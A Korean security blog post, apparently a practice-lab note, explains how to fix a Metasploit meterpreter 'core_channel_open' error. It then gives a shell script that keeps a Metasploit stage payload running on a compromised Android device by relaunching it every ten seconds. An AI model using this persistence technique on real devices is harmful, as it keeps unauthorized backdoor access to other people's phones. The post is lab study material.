Notice
Recent Posts
Recent Comments
Link
일 | 월 | 화 | 수 | 목 | 금 | 토 |
---|---|---|---|---|---|---|
1 | 2 | 3 | 4 | 5 | ||
6 | 7 | 8 | 9 | 10 | 11 | 12 |
13 | 14 | 15 | 16 | 17 | 18 | 19 |
20 | 21 | 22 | 23 | 24 | 25 | 26 |
27 | 28 | 29 | 30 |
Tags
- ipsec
- 정보보안
- Linux
- CentOS
- 윈도우서버
- 볼륨
- ㅂ
- DiskQuata
- TrueCrypt
- 실습
- VPN
- 마운트
- cybersecurity
- backtrack
- 오류
- VMwares
- network
- 윈도우볼륨축소
- 네트워크
- redhat
- 윈도우
- 프로젝트
- mount
- 제어판
- 예시
- defrag
- BTr3
- debian
- window
Archives
- Today
- Total
정보 보안을 향한 항해
meta "[-] core_channel_open: Operation failed: 1" 오류 해결 본문
1. 명령어
set AutoLoadStdapi true
2. 연결 후 영구 설정
meterpreter > shell
Process 1 created.
Channel 1 created.
touch persistentscript.sh
echo "#!/bin/sh
while :
do am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity
sleep 10
done
" > persistentscript.sh
sh persistentscript.sh